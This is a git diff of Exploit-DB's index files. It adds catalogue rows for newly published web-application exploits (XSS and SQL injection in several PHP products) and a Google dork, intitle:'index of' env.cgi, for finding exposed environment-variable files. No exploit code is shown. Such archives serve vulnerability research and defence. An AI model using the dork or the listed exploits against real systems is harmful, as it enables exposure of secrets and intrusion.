2.4.1 - Multiple Vulnerabilities",2016-09-07,kor3k,webapps,php,80,2016-09-07,2016-09-07,0,,,,,http://www.exploit-db.comcumulusclips.zip, 25971,exploits/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",webapps,php,,2013-06-05,2016-10-24,1,OSVDB-94101,,,http://www.exploit-db.com/screenshots/idlt26000/screen-shot-2013-06-05-at-110840-am.png,http://www.exploit-db.comcuppa_cms.zip, 47973,exploits/php/webapps/47973.txt,"Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)",2020-01-29,J3rryBl4nks,webapps,php,,2020-01-29,2020-01-29,0,CVE-2020-8425;CVE-2020-8424,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comcupseasylive-1.0.rar, +51778,exploits/php/webapps/51778.txt,"Curfew e-Pass Management System 1.0 - FromDate SQL Injection",2024-02-05,"Puja Dey",webapps,php,,2024-02-05,2024-02-05,0,,,,,, 49391,exploits/php/webapps/49391.txt,"Curfew e-Pass Management System 1.0 - Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,,2021-01-07,2021-01-07,0,,,,,, 45719,exploits/php/webapps/45719.txt,"Curriculum Evaluation System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80,2018-10-29,2018-10-29,0,CVE-2018-18803,"SQL Injection (SQLi)",,,http://www.exploit-db.comcurriculumevaluationsystem_0.zip, 34825,exploits/php/webapps/34825.html,"Curverider Elgg 1.0 - Templates HTML Injection",2009-06-22,lorddemon,webapps,php,,2009-06-22,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43871/info @@ -19387,6 +19391,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48940,exploits/php/webapps/48940.txt,"Gym Management System 1.0 - Authentication Bypass",2020-10-23,"Jyotsna Adhana",webapps,php,,2020-10-23,2020-10-23,0,,,,,, 48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,,2020-10-23,2020-10-23,0,,,,,, 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,,2020-05-22,2020-05-22,0,,,,,, +51777,exploits/php/webapps/51777.txt,"GYM MS - GYM Management System - Cross Site Scripting (Stored)",2024-02-05,yozgatalperen1,webapps,php,,2024-02-05,2024-02-05,0,,,,,, 9640,exploits/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,webapps,php,,2009-09-10,,1,OSVDB-58360;CVE-2009-3349;OSVDB-58359;CVE-2009-3348,,,,, 51559,exploits/php/webapps/51559.txt,"GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,, 32541,exploits/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,webapps,php,,2008-10-28,2014-03-26,1,CVE-2008-5064;OSVDB-49439,,,,,https://www.securityfocus.com/bid/31963/info @@ -23457,6 +23462,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 26901,exploits/php/webapps/26901.txt,"Miraserver 1.0 RC4 - 'newsitem.php?id' SQL Injection",2005-12-19,r0t,webapps,php,,2005-12-19,2013-07-17,1,CVE-2005-4408;OSVDB-21837,,,,,https://www.securityfocus.com/bid/15960/info 37633,exploits/php/webapps/37633.txt,"mIRC - 'projects.php' Cross-Site Scripting",2012-08-10,TayfunBasoglu,webapps,php,,2012-08-10,2015-07-18,1,,,,,,https://www.securityfocus.com/bid/54989/info 30751,exploits/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",webapps,php,,2007-11-12,2014-01-06,1,CVE-2007-3694;OSVDB-39735,,,,,https://www.securityfocus.com/bid/26407/info +51780,exploits/php/webapps/51780.txt,"MISP 2.4.171 - Stored XSS",2024-02-05,"Mücahit Çeri",webapps,php,,2024-02-05,2024-02-05,0,,,,,, 46401,exploits/php/webapps/46401.py,"MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module",2019-02-18,Tm9jdGlz,webapps,php,80,2019-02-18,2019-02-18,0,CVE-2018-19908,"Code Injection",,,http://www.exploit-db.comMISP-2.4.97.tar.gz, 5214,exploits/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,webapps,php,,2008-03-03,,1,,,,,, 47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80,2019-08-12,2019-08-14,0,CVE-2019-14927,,,,, @@ -30525,6 +30531,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990 51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,, +51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,, 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,, 34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info 34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info @@ -32575,6 +32582,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,,2018-04-09,2018-04-09,0,,,,,, 51156,exploits/php/webapps/51156.txt,"WooCommerce v7.1.0 - Remote Code Execution(RCE)",2023-03-31,"Milad karimi",webapps,php,,2023-03-31,2023-03-31,0,,,,,, 12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,webapps,php,,2010-05-10,,1,,,,,, +51783,exploits/php/webapps/51783.txt,"Wordpress 'simple urls' Plugin < 115 - XSS",2024-02-05,AmirZargham,webapps,php,,2024-02-05,2024-02-05,0,,,,,, 50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,, 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,, 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",2021-09-20,"David Utón",webapps,php,,2021-09-20,2021-09-20,0,CVE-2021-29447,,,,, diff --git a/ghdb.xml b/ghdb.xml index 9f94ad5427..c9facd4615 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -32898,7 +32898,7 @@ Google Dork: "Started by upstream project" ext:txthttps://www.google.com/search?q="Started by upstream project" ext:txt 2024-02-02 - nadirb19 + Nadir Boulacheb (RubX) 4162 @@ -47638,6 +47638,21 @@ Bruno Schmid 2023-11-02 Esteban Brenes Segura + + 8404 + https://www.exploit-db.com/ghdb/8404 + Files Containing Juicy Info + intitle:"index of" env.cgi + Simple Dork that displays the env file which contains env +variables, usually juicy stuff and a lot of information disclosure. + +*intitle:"index of" env.cgi* + intitle:"index of" env.cgi + https://www.google.com/search?q=intitle:"index of" env.cgi + + 2024-02-05 + Wallehazz + 5917 https://www.exploit-db.com/ghdb/5917 @@ -116857,7 +116872,7 @@ Dork: intitle:"Installation Wizard - PowerCMS v2" https://www.google.com/search?q=intitle:"Installation Wizard - PowerCMS v2" 2024-02-02 - nadirb19 + Nadir Boulacheb (RubX) 753 @@ -116992,7 +117007,7 @@ Dork: intitle:"Welcome to iTop version" wizard https://www.google.com/search?q=intitle:"Welcome to iTop version" wizard 2024-02-02 - nadirb19 + Nadir Boulacheb (RubX) 6419